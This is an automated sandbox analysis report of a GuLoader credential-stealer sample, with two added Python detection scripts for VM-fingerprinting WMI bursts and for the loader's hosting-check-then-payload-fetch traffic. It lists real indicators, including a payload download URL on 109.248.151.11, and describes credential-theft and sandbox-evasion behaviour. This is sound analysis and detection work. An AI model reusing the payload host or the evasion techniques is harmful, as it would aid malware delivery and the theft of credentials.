Windows Analysis Report
99200032052824.bat.exe

Overview

General Information

Sample name: 99200032052824.bat.exe
Analysis ID: 1447846
MD5: 085de7ac75bbd791c1b1f979fe8ff78c
SHA1: f33f25a99dbf0f7b9c2ad2bc886e7748cb5d888f
SHA256: f76bdeb70f9927c49aa87d92d92eb93d05317a3bde63da7a78a11033b29b41ab

Detection

GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
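The six WMI signatures above (Win32_NetworkAdapter, Win32_VideoController, Win32_Bios, Win32_BaseBoard, Win32_ComputerSystem, Win32_Processor) are individually common in legitimate inventory tooling; what makes them a sandbox-evasion indicator is one process enumerating several of them in quick succession. The following detection logic is an added example, not part of the Joe Sandbox report: it parses constructed telemetry lines written in the same form the report prints WMI calls (IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor) and alerts when a non-allowlisted image touches at least THRESHOLD distinct fingerprint classes inside WINDOW_SECONDS. The allowlist path, the threshold and the window are assumed tuning values, and the event format is constructed for the example.

```python
import re
from collections import defaultdict

# WMI classes whose enumeration, taken together, fingerprints the hardware.
# These are the six classes the sandbox flagged for this sample.
VM_FINGERPRINT_CLASSES = {
    "Win32_Processor", "Win32_Bios", "Win32_BaseBoard", "Win32_ComputerSystem",
    "Win32_VideoController", "Win32_NetworkAdapter",
}
# Hypothetical allowlist of inventory agents expected to query these classes.
ALLOWLISTED_IMAGES = {r"C:\Program Files\Inventory\agent.exe"}
THRESHOLD = 3        # distinct fingerprint classes (assumed tuning value)
WINDOW_SECONDS = 60  # sliding window (assumed tuning value)

# Telemetry line: "<epoch> <image path> IWbemServices::<call> - <namespace> : <class>".
# The image path may contain spaces, so it is matched non-greedily up to the call.
EVENT_RE = re.compile(
    r"^(?P<ts>\d+) (?P<image>.+?) IWbemServices::(?P<call>\w+) - (?P<ns>\S+) : (?P<cls>\w+)$"
)

# Constructed sample events (not from the report): the sample's burst of
# fingerprint queries, an allowlisted inventory agent, and a benign process
# that touches two classes far apart in time.
SAMPLE_EVENTS = """\
1717000100 C:\\Users\\user\\Desktop\\99200032052824.bat.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_Processor
1717000101 C:\\Users\\user\\Desktop\\99200032052824.bat.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_Bios
1717000101 C:\\Users\\user\\Desktop\\99200032052824.bat.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_BaseBoard
1717000102 C:\\Users\\user\\Desktop\\99200032052824.bat.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_VideoController
1717000102 C:\\Users\\user\\Desktop\\99200032052824.bat.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_NetworkAdapter
1717000150 C:\\Program Files\\Inventory\\agent.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_Processor
1717000151 C:\\Program Files\\Inventory\\agent.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_Bios
1717000152 C:\\Program Files\\Inventory\\agent.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_ComputerSystem
1717000200 C:\\Windows\\System32\\taskmgr.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_Processor
1717000900 C:\\Windows\\System32\\taskmgr.exe IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_Bios
"""


def parse_events(text):
    """Return a list of (timestamp, image, wmi_class) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if m:
            events.append((int(m["ts"]), m["image"], m["cls"]))
    return events


def detect_vm_fingerprinting(text):
    """Return {image: sorted fingerprint classes} for every non-allowlisted image
    that enumerates at least THRESHOLD distinct fingerprint classes within
    WINDOW_SECONDS of each other."""
    per_image = defaultdict(list)
    for ts, image, cls in parse_events(text):
        if cls in VM_FINGERPRINT_CLASSES:
            per_image[image].append((ts, cls))

    alerts = {}
    for image, evs in per_image.items():
        if image in ALLOWLISTED_IMAGES:
            continue
        evs.sort()
        # Slide a window starting at each event; alert on the first window that
        # reaches the threshold so a process is reported once.
        for i, (t0, _) in enumerate(evs):
            window = {c for t, c in evs[i:] if t - t0 <= WINDOW_SECONDS}
            if len(window) >= THRESHOLD:
                alerts[image] = sorted(window)
                break
    return alerts


if __name__ == "__main__":
    for image, classes in detect_vm_fingerprinting(SAMPLE_EVENTS).items():
        print(f"VM-fingerprinting burst from {image}: {', '.join(classes)}")
```

The burst-within-a-window shape is what separates this sample from inventory agents and Task Manager, both of which enumerate the same classes but either are known images or spread the queries out; tune THRESHOLD and WINDOW_SECONDS against your own telemetry before deploying.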

Classification

AV Detection

Source: 99200032052824.bat.exe ReversingLabs: Detection: 13%
Source: 99200032052824.bat.exe Virustotal: Detection: 20%
Source: 99200032052824.bat.exe Joe Sandbox ML: detected
Source: 99200032052824.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 99200032052824.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 5_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004062A3 FindFirstFileA,FindClose, 5_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004026FE FindFirstFileA, 5_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 9_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_004026FE FindFirstFileA, 9_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_004062A3 FindFirstFileA,FindClose, 9_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
Source: unknown DNS query: name: ip-api.com
Source: global traffic HTTP traffic detected: GET /LZJRCXHEEshk185.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 109.248.151.11 | Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 109.248.151.11 (50 such connections logged)
Source: global traffic DNS traffic detected: DNS query: ip-api.com
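The two HTTP requests above are the network side of the "Check if machine is in data center or colocation facility" signature: the loader first asks ip-api.com for only the hosting field of its own public IP, sending no User-Agent at all, and only then fetches the encrypted payload (LZJRCXHEEshk185.bin) from a bare IP address with a spoofed Firefox User-Agent and no preceding DNS lookup. The detection logic below is an added example, not part of the Joe Sandbox report: it runs over constructed proxy-log lines (tab-separated epoch, process, method, host, path, user agent; the two GuLoader requests are reconstructed from the report, the remaining lines are benign noise) and correlates the hosting-oracle check with a bare-IP payload fetch from the same process. The log format, the GEOIP_HOSTS set, the payload extensions and the correlation window are assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample proxy log (not from the report). One request per line:
#   epoch_seconds <TAB> process <TAB> method <TAB> host <TAB> path <TAB> user_agent
# "-" in the last column means the request carried no User-Agent header.
SAMPLE_LOG = """\
1717000000\t99200032052824.bat.exe\tGET\tip-api.com\t/line/?fields=hosting\t-
1717000003\t99200032052824.bat.exe\tGET\t109.248.151.11\t/LZJRCXHEEshk185.bin\tMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1717000010\tfirefox.exe\tGET\texample.org\t/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1717000020\tinventory.exe\tGET\tip-api.com\t/json/\tInventoryAgent/1.0
1717000030\tupdater.exe\tGET\t10.0.0.5\t/firmware.bin\tUpdater/2.1
"""

# Geo-IP services abused as an "am I in a data center?" oracle (assumed list).
GEOIP_HOSTS = {"ip-api.com"}
# Query-string field names that reveal the hosting / proxy check.
HOSTING_FIELDS = re.compile(r"(?:^|[?&,])fields=[^&]*\b(hosting|proxy)\b", re.I)
BROWSER_UA = re.compile(r"^Mozilla/\d", re.I)
PAYLOAD_EXT = (".bin", ".dat", ".exe", ".dll", ".ps1")   # assumed staging extensions
CORRELATION_WINDOW = 120  # seconds allowed between oracle check and fetch (assumed)


def parse_log(text):
    """Parse the constructed tab-separated log into a list of request dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proc, method, host, path, ua = line.split("\t")
        records.append({"ts": int(ts), "process": proc, "method": method,
                        "host": host, "path": path, "ua": ua})
    return records


def is_bare_ip(host):
    """True when the Host header is a literal IP rather than a DNS name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def classify(rec):
    """Return the rule names a single request trips (empty list if benign)."""
    hits = []
    if rec["host"].lower() in GEOIP_HOSTS and HOSTING_FIELDS.search(rec["path"]):
        hits.append("hosting_oracle_check")
        if rec["ua"] in ("-", ""):
            hits.append("no_user_agent")
    # A download from a bare *public* IP is the loader's payload fetch; private
    # addresses are excluded so internal update servers do not trip the rule.
    if (is_bare_ip(rec["host"]) and not ip_address(rec["host"]).is_private
            and rec["path"].lower().endswith(PAYLOAD_EXT)):
        hits.append("bare_ip_payload_fetch")
        if BROWSER_UA.match(rec["ua"]):
            hits.append("spoofed_browser_ua")
    return hits


def detect(text):
    """Return {process: verdict} for every process that trips at least one rule.

    The verdict is "guloader_staging" when the same process performs the
    hosting-oracle check and then fetches a payload from a bare public IP
    within CORRELATION_WINDOW seconds; otherwise the individual hits are listed.
    """
    per_proc = defaultdict(list)
    for rec in parse_log(text):
        for rule in classify(rec):
            per_proc[rec["process"]].append((rec["ts"], rule))

    verdicts = {}
    for proc, events in per_proc.items():
        checks = [t for t, r in events if r == "hosting_oracle_check"]
        fetches = [t for t, r in events if r == "bare_ip_payload_fetch"]
        if any(0 <= f - c <= CORRELATION_WINDOW for c in checks for f in fetches):
            verdicts[proc] = "guloader_staging"
        else:
            verdicts[proc] = "suspicious:" + ",".join(sorted({r for _, r in events}))
    return verdicts


if __name__ == "__main__":
    for proc, verdict in detect(SAMPLE_LOG).items():
        print(f"{proc}: {verdict}")
```

Either request alone is a weak signal (inventory agents query ip-api.com, updaters pull .bin files), which is why the verdict is only raised when one process does both in order; note also that the report shows no DNS query for 109.248.151.11, so a proxy or DNS-correlation log that records "host contacted without prior resolution" would give a third independent indicator.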
Source: 99200032052824.bat.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 99200032052824.bat.exe, 00000005.00000000.1295915464666.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 99200032052824.bat.exe, 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard, 5_2_00405205
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 5_2_0040320C
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 9_2_0040320C
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00404A44 5_2_00404A44
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00406F54 5_2_00406F54
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_0040677D 5_2_0040677D
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_73A31A98 5_2_73A31A98
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00404A44 9_2_00404A44
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00406F54 9_2_00406F54
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0040677D 9_2_0040677D
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00169028 9_2_00169028
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_001688BB 9_2_001688BB
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_001638F8 9_2_001638F8
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00164910 9_2_00164910
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0016C360 9_2_0016C360
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0016F6A0 9_2_0016F6A0
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00164040 9_2_00164040
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0016E98A 9_2_0016E98A
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F7700 9_2_375F7700
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F8668 9_2_375F8668
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F2690 9_2_375F2690
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F1CA0 9_2_375F1CA0
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375F3750 9_2_375F3750
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_375FA880 9_2_375FA880
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_0016C648 9_2_0016C648
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: String function: 00402ACB appears 48 times
Source: 99200032052824.bat.exe, 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameskrumpeleverne.exeD vs 99200032052824.bat.exe
Source: 99200032052824.bat.exe, 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameskrumpeleverne.exeD vs 99200032052824.bat.exe
Source: 99200032052824.bat.exe, 00000009.00000002.1301021306350.0000000006DA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 99200032052824.bat.exe
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@3/23@1/2
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004044D1 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 5_2_004044D1
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004020D1 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk, 5_2_004020D1
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle
Source: C:\Users\user\Desktop\99200032052824.bat.exe Mutant created: NULL
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsxD41F.tmp
Source: 99200032052824.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\99200032052824.bat.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\99200032052824.bat.exe File read: C:\Users\user\Desktop\99200032052824.bat.exe
Source: unknown Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\99200032052824.bat.exe File written: C:\Users\user\AppData\Local\Temp\tmc.ini
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Data Obfuscation

Source: Yara match File source: Process Memory Space: 99200032052824.bat.exe PID: 8652, type: MEMORYSTR
Source: Yara match File source: 00000005.00000002.1296162651331.0000000005B73000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_73A31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 5_2_73A31A98
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_73A32F20 push eax; ret 5_2_73A32F4E
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Nydannelses.Aar
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Krapyls172.syg
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\parallelopipedon.idi
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Mattias.nap
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Sestertius.djv
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Slidsomt.bra
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\afkontrollere.urb
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\afslres.ten
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\discomposed.non
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\dred.jpg
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\gametophoric.txt
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\isocola.sol
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\malningerne.bog
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\monodomous.kal
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\ornery.cem
